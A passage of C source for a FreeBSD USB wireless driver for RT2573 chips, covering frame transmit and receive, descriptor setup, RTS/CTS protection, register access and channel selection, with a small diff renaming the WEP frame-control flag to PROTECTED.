vap->iv_ic; usb_callout_drain(&rvp->ratectl_ch); ieee80211_draintask(ic, &rvp->ratectl_task); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } static void rum_tx_free(struct rum_tx_data *data, int txerr) { struct rum_softc *sc = data->sc; if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; } STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } static void rum_setup_tx_list(struct rum_softc *sc) { struct rum_tx_data *data; int i; sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); for (i = 0; i < RUM_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; data->sc = sc; STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } } static void rum_unsetup_tx_list(struct rum_softc *sc) { struct rum_tx_data *data; int i; /* make sure any subsequent use of the queues will fail */ sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); /* free up all node references and mbufs */ for (i = 0; i < RUM_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int rum_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rum_vap *rvp = RUM_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rum_softc *sc = ic->ic_ifp->if_softc; const struct ieee80211_txparam *tp; enum ieee80211_state ostate; struct ieee80211_node *ni; uint32_t tmp; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); RUM_LOCK(sc); usb_callout_stop(&rvp->ratectl_ch); switch (nstate) { case IEEE80211_S_INIT: if (ostate == IEEE80211_S_RUN) { /* abort TSF synchronization */ tmp = rum_read(sc, RT2573_TXRX_CSR9); rum_write(sc, RT2573_TXRX_CSR9, tmp & ~0x00ffffff); } break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); if (vap->iv_opmode != IEEE80211_M_MONITOR) { if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { RUM_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } rum_update_slot(ic->ic_ifp); rum_enable_mrr(sc); rum_set_txpreamble(sc); rum_set_basicrates(sc); IEEE80211_ADDR_COPY(sc->sc_bssid, ni->ni_bssid); rum_set_bssid(sc, sc->sc_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS) 
rum_prepare_beacon(sc, vap); if (vap->iv_opmode != IEEE80211_M_MONITOR) rum_enable_tsf_sync(sc); else rum_enable_tsf(sc); /* enable automatic rate adaptation */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) rum_ratectl_start(sc, ni); ieee80211_free_node(ni); break; default: break; } RUM_UNLOCK(sc); IEEE80211_LOCK(ic); return (rvp->newstate(vap, nstate, arg)); } static void rum_bulk_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct rum_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap; struct rum_tx_data *data; struct mbuf *m; struct usb_page_cache *pc; unsigned int len; int actlen, sumlen; usbd_xfer_status(xfer, &actlen, &sumlen, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(11, "transfer complete, %d bytes\n", actlen); /* free resources */ data = usbd_xfer_get_priv(xfer); rum_tx_free(data, 0); usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->tx_q); if (data) { STAILQ_REMOVE_HEAD(&sc->tx_q, next); m = data->m; if (m->m_pkthdr.len > (int)(MCLBYTES + RT2573_TX_DESC_SIZE)) { DPRINTFN(0, "data overflow, %u bytes\n", m->m_pkthdr.len); m->m_pkthdr.len = (MCLBYTES + RT2573_TX_DESC_SIZE); } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, &data->desc, RT2573_TX_DESC_SIZE); usbd_m_copy_in(pc, RT2573_TX_DESC_SIZE, m, 0, m->m_pkthdr.len); vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct rum_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = data->rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m); } /* align end on a 4-bytes boundary */ len = (RT2573_TX_DESC_SIZE + m->m_pkthdr.len + 3) & ~3; if ((len % 64) == 0) len += 4; DPRINTFN(11, "sending frame len=%u xferlen=%u\n", m->m_pkthdr.len, len); usbd_xfer_set_frame_len(xfer, 0, len); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); } RUM_UNLOCK(sc); rum_start(ifp); RUM_LOCK(sc); break; default: /* Error */ DPRINTFN(11, "transfer error, %s\n", usbd_errstr(error)); ifp->if_oerrors++; data = usbd_xfer_get_priv(xfer); if (data != NULL) { rum_tx_free(data, error); usbd_xfer_set_priv(xfer, NULL); } if (error != USB_ERR_CANCELLED) { if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); /* * Try to clear stall first, also if other * errors occur, hence clearing stall * introduces a 50 ms delay: */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static void rum_bulk_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct rum_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni; struct mbuf *m = NULL; struct usb_page_cache *pc; uint32_t flags; uint8_t rssi = 0; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(15, "rx done, actlen=%d\n", len); if (len < (int)(RT2573_RX_DESC_SIZE + IEEE80211_MIN_LEN)) { DPRINTF("%s: xfer too short %d\n", device_get_nameunit(sc->sc_dev), len); ifp->if_ierrors++; goto tr_setup; } len -= RT2573_RX_DESC_SIZE; pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, 0, &sc->sc_rx_desc, RT2573_RX_DESC_SIZE); rssi = rum_get_rssi(sc, sc->sc_rx_desc.rssi); flags = le32toh(sc->sc_rx_desc.flags); if (flags & RT2573_RX_CRC_ERROR) { /* * This should not happen since we did not * request to receive those frames when we 
* filled RUM_TXRX_CSR2: */ DPRINTFN(5, "PHY or CRC error\n"); ifp->if_ierrors++; goto tr_setup; } m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { DPRINTF("could not allocate mbuf\n"); ifp->if_ierrors++; goto tr_setup; } usbd_copy_out(pc, RT2573_RX_DESC_SIZE, mtod(m, uint8_t *), len); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (flags >> 16) & 0xfff; if (ieee80211_radiotap_active(ic)) { struct rum_rx_radiotap_header *tap = &sc->sc_rxtap; /* XXX read tsf */ tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(sc->sc_rx_desc.rate, (flags & RT2573_RX_OFDM) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antsignal = RT2573_NOISE_FLOOR + rssi; tap->wr_antnoise = RT2573_NOISE_FLOOR; tap->wr_antenna = sc->rx_ant; } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * At the end of a USB callback it is always safe to unlock * the private mutex of a device! That is why we do the * "ieee80211_input" here, and not some lines up! */ RUM_UNLOCK(sc); if (m) { ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, RT2573_NOISE_FLOOR); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, RT2573_NOISE_FLOOR); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) rum_start(ifp); RUM_LOCK(sc); return; default: /* Error */ if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } return; } } static uint8_t rum_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void rum_setup_tx_desc(struct rum_softc *sc, struct rum_tx_desc *desc, uint32_t flags, uint16_t xflags, int len, int rate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int remainder; desc->flags = htole32(flags); desc->flags |= htole32(RT2573_TX_VALID); desc->flags |= htole32(len << 16); desc->xflags = htole16(xflags); desc->wme = htole16(RT2573_QID(0) | RT2573_AIFSN(2) | RT2573_LOGCWMIN(4) | RT2573_LOGCWMAX(10)); /* setup PLCP fields */ desc->plcp_signal = rum_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RT2573_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RT2573_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } } static int rum_sendprot(struct rum_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_frame *wh; struct rum_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort; uint16_t dur; RUM_LOCK_ASSERT(sc, MA_OWNED); 
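	/*
	 * Build an RTS or CTS-to-self frame protecting "m": the NAV
	 * duration covers the protected frame plus its ACK (plus the CTS
	 * response when RTS is used), and the protection frame is queued
	 * on the bulk-write pipe ahead of the data frame itself.
	 */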
KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RT2573_TX_MORE_FRAG; if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RT2573_TX_NEED_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return (ENOBUFS); } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = mprot; data->ni = ieee80211_ref_node(ni); data->rate = protrate; rum_setup_tx_desc(sc, &data->desc, flags, 0, mprot->m_pkthdr.len, protrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return 0; } static int rum_tx_mgt(struct rum_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rum_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; uint32_t flags = 0; uint16_t dur; RUM_LOCK_ASSERT(sc, MA_OWNED); data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } wh = mtod(m0, struct ieee80211_frame *); } tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2573_TX_NEED_ACK; dur = ieee80211_ack_duration(ic->ic_rt, tp->mgmtrate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) flags |= RT2573_TX_TIMESTAMP; } data->m = m0; data->ni = ni; data->rate = tp->mgmtrate; rum_setup_tx_desc(sc, &data->desc, flags, 0, m0->m_pkthdr.len, tp->mgmtrate); DPRINTFN(10, "sending mgt frame len=%d rate=%d\n", m0->m_pkthdr.len + (int)RT2573_TX_DESC_SIZE, tp->mgmtrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return (0); } static int rum_tx_raw(struct rum_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct rum_tx_data *data; uint32_t flags; int rate, error; RUM_LOCK_ASSERT(sc, MA_OWNED); KASSERT(params != NULL, ("no raw xmit params")); rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { m_freem(m0); return EINVAL; } flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= RT2573_TX_NEED_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = rum_sendprot(sc, m0, ni, params->ibp_flags & IEEE80211_BPF_RTS ? 
IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RT2573_TX_LONG_RETRY | RT2573_TX_IFS_SIFS; } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; /* XXX need to setup descriptor ourself */ rum_setup_tx_desc(sc, &data->desc, flags, 0, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending raw frame len=%u rate=%u\n", m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return 0; } static int rum_tx_data(struct rum_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rum_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; uint32_t flags = 0; uint16_t dur; int error, rate; RUM_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else rate = ni->ni_txrate; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = rum_sendprot(sc, m0, ni, prot, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RT2573_TX_LONG_RETRY | RT2573_TX_IFS_SIFS; } } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2573_TX_NEED_ACK; flags |= RT2573_TX_MORE_FRAG; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); } rum_setup_tx_desc(sc, &data->desc, flags, 0, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending frame len=%d rate=%d\n", m0->m_pkthdr.len + (int)RT2573_TX_DESC_SIZE, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return 0; } static void rum_start(struct ifnet *ifp) { struct rum_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RUM_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { RUM_UNLOCK(sc); return; } for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->tx_nfree < RUM_TX_MINFREE) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (rum_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } } RUM_UNLOCK(sc); } static int rum_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rum_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; RUM_LOCK(sc); error = sc->sc_detached ? 
ENXIO : 0; RUM_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: RUM_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rum_init_locked(sc); startall = 1; } else rum_setpromisc(sc); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rum_stop(sc); } RUM_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void rum_eeprom_read(struct rum_softc *sc, uint16_t addr, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2573_READ_EEPROM; USETW(req.wValue, 0); USETW(req.wIndex, addr); USETW(req.wLength, len); error = rum_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not read EEPROM: %s\n", usbd_errstr(error)); } } static uint32_t rum_read(struct rum_softc *sc, uint16_t reg) { uint32_t val; rum_read_multi(sc, reg, &val, sizeof val); return le32toh(val); } static void rum_read_multi(struct rum_softc *sc, uint16_t reg, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2573_READ_MULTI_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); error = rum_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not multi read MAC register: %s\n", usbd_errstr(error)); } } static usb_error_t rum_write(struct rum_softc *sc, uint16_t reg, uint32_t val) { uint32_t tmp = htole32(val); return (rum_write_multi(sc, reg, &tmp, sizeof tmp)); } static usb_error_t rum_write_multi(struct rum_softc *sc, uint16_t reg, void *buf, size_t len) { struct usb_device_request req; usb_error_t error; size_t offset; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2573_WRITE_MULTI_MAC; USETW(req.wValue, 0); /* write at most 64 bytes at a time */ for (offset = 0; offset < len; offset += 64) { USETW(req.wIndex, reg + offset); USETW(req.wLength, MIN(len - offset, 64)); error = rum_do_request(sc, &req, (char *)buf + offset); if (error != 0) { device_printf(sc->sc_dev, "could not multi write MAC register: %s\n", usbd_errstr(error)); return (error); } } return (USB_ERR_NORMAL_COMPLETION); } static void rum_bbp_write(struct rum_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; DPRINTFN(2, "reg=0x%08x\n", reg); for (ntries = 0; ntries < 100; ntries++) { if (!(rum_read(sc, RT2573_PHY_CSR3) & RT2573_BBP_BUSY)) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = RT2573_BBP_BUSY | (reg & 0x7f) << 8 | val; rum_write(sc, RT2573_PHY_CSR3, tmp); } static uint8_t rum_bbp_read(struct rum_softc *sc, uint8_t reg) { uint32_t val; int ntries; DPRINTFN(2, "reg=0x%08x\n", reg); for (ntries = 0; ntries < 100; ntries++) { if (!(rum_read(sc, RT2573_PHY_CSR3) & RT2573_BBP_BUSY)) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not read BBP\n"); return 0; } val = RT2573_BBP_BUSY | RT2573_BBP_READ | reg << 8; rum_write(sc, RT2573_PHY_CSR3, val); for (ntries = 0; ntries < 100; ntries++) { val = rum_read(sc, RT2573_PHY_CSR3); if (!(val & RT2573_BBP_BUSY)) return val & 0xff; if (rum_pause(sc, hz / 100)) break; } device_printf(sc->sc_dev, "could not read BBP\n"); return 0; } static void rum_rf_write(struct rum_softc 
*sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(rum_read(sc, RT2573_PHY_CSR4) & RT2573_RF_BUSY)) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT2573_RF_BUSY | RT2573_RF_20BIT | (val & 0xfffff) << 2 | (reg & 3); rum_write(sc, RT2573_PHY_CSR4, tmp); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(15, "RF R[%u] <- 0x%05x\n", reg & 3, val & 0xfffff); } static void rum_select_antenna(struct rum_softc *sc) { uint8_t bbp4, bbp77; uint32_t tmp; bbp4 = rum_bbp_read(sc, 4); bbp77 = rum_bbp_read(sc, 77); /* TBD */ /* make sure Rx is disabled before switching antenna */ tmp = rum_read(sc, RT2573_TXRX_CSR0); rum_write(sc, RT2573_TXRX_CSR0, tmp | RT2573_DISABLE_RX); rum_bbp_write(sc, 4, bbp4); rum_bbp_write(sc, 77, bbp77); rum_write(sc, RT2573_TXRX_CSR0, tmp); } /* * Enable multi-rate retries for frames sent at OFDM rates. * In 802.11b/g mode, allow fallback to CCK rates. */ static void rum_enable_mrr(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = rum_read(sc, RT2573_TXRX_CSR4); tmp &= ~RT2573_MRR_CCK_FALLBACK; if (!IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) tmp |= RT2573_MRR_CCK_FALLBACK; tmp |= RT2573_MRR_ENABLED; rum_write(sc, RT2573_TXRX_CSR4, tmp); } static void rum_set_txpreamble(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = rum_read(sc, RT2573_TXRX_CSR4); tmp &= ~RT2573_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2573_SHORT_PREAMBLE; rum_write(sc, RT2573_TXRX_CSR4, tmp); } static void rum_set_basicrates(struct rum_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; /* update basic rate set */ if (ic->ic_curmode == IEEE80211_MODE_11B) { /* 11b basic rates: 1, 2Mbps */ rum_write(sc, RT2573_TXRX_CSR5, 0x3); } else if (IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) { /* 11a basic rates: 6, 12, 24Mbps */ rum_write(sc, RT2573_TXRX_CSR5, 0x150); } else { /* 11b/g basic rates: 1, 2, 5.5, 11Mbps */ rum_write(sc, RT2573_TXRX_CSR5, 0xf); } } /* * Reprogram MAC/BBP to switch to a new band. Values taken from the reference * driver. 
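 * BBP registers 17, 35, 96, 97, 98 and 104 are programmed with a 2GHz
 * base value plus fixed offsets for 5GHz and, for some of them, for an
 * external LNA; PHY_CSR0 then enables the PA of the selected band only.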
*/ static void rum_select_band(struct rum_softc *sc, struct ieee80211_channel *c) { uint8_t bbp17, bbp35, bbp96, bbp97, bbp98, bbp104; uint32_t tmp; /* update all BBP registers that depend on the band */ bbp17 = 0x20; bbp96 = 0x48; bbp104 = 0x2c; bbp35 = 0x50; bbp97 = 0x48; bbp98 = 0x48; if (IEEE80211_IS_CHAN_5GHZ(c)) { bbp17 += 0x08; bbp96 += 0x10; bbp104 += 0x0c; bbp35 += 0x10; bbp97 += 0x10; bbp98 += 0x10; } if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { bbp17 += 0x10; bbp96 += 0x10; bbp104 += 0x10; } sc->bbp17 = bbp17; rum_bbp_write(sc, 17, bbp17); rum_bbp_write(sc, 96, bbp96); rum_bbp_write(sc, 104, bbp104); if ((IEEE80211_IS_CHAN_2GHZ(c) && sc->ext_2ghz_lna) || (IEEE80211_IS_CHAN_5GHZ(c) && sc->ext_5ghz_lna)) { rum_bbp_write(sc, 75, 0x80); rum_bbp_write(sc, 86, 0x80); rum_bbp_write(sc, 88, 0x80); } rum_bbp_write(sc, 35, bbp35); rum_bbp_write(sc, 97, bbp97); rum_bbp_write(sc, 98, bbp98); tmp = rum_read(sc, RT2573_PHY_CSR0); tmp &= ~(RT2573_PA_PE_2GHZ | RT2573_PA_PE_5GHZ); if (IEEE80211_IS_CHAN_2GHZ(c)) tmp |= RT2573_PA_PE_2GHZ; else tmp |= RT2573_PA_PE_5GHZ; rum_write(sc, RT2573_PHY_CSR0, tmp); } static void rum_set_chan(struct rum_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct rfprog *rfprog; uint8_t bbp3, bbp94 = RT2573_BBPR94_DEFAULT; int8_t power; int i, chan; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return; /* select the appropriate RF settings based on what EEPROM says */ rfprog = (sc->rf_rev == RT2573_RF_5225 || sc->rf_rev == RT2573_RF_2527) ? rum_rf5225 : rum_rf5226; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); power = sc->txpow[i]; if (power < 0) { bbp94 += power; power = 0; } else if (power > 31) { bbp94 += power - 31; power = 31; } /* * If we are switching from the 2GHz band to the 5GHz band or * vice-versa, BBP registers need to be reprogrammed. */ if (c->ic_flags != ic->ic_curchan->ic_flags) { rum_select_band(sc, c); rum_select_antenna(sc); } ic->ic_curchan = c; rum_rf_write(sc, RT2573_RF1, rfprog[i].r1); rum_rf_write(sc, RT2573_RF2, rfprog[i].r2); rum_rf_write(sc, RT2573_RF3, rfprog[i].r3 | power << 7); rum_rf_write(sc, RT2573_RF4, rfprog[i].r4 | sc->rffreq << 10); rum_rf_write(sc, RT2573_RF1, rfprog[i].r1); rum_rf_write(sc, RT2573_RF2, rfprog[i].r2); rum_rf_write(sc, RT2573_RF3, rfprog[i].r3 | power << 7 | 1); rum_rf_write(sc, RT2573_RF4, rfprog[i].r4 | sc->rffreq << 10); rum_rf_write(sc, RT2573_RF1, rfprog[i].r1); rum_rf_write(sc, RT2573_RF2, rfprog[i].r2); rum_rf_write(sc, RT2573_RF3, rfprog[i].r3 | power << 7); rum_rf_write(sc, RT2573_RF4, rfprog[i].r4 | sc->rffreq << 10); rum_pause(sc, hz / 100); /* enable smart mode for MIMO-capable RFs */ bbp3 = rum_bbp_read(sc, 3); bbp3 &= ~RT2573_SMART_MODE; if (sc->rf_rev == RT2573_RF_5225 || sc->rf_rev == RT2573_RF_2527) bbp3 |= RT2573_SMART_MODE; 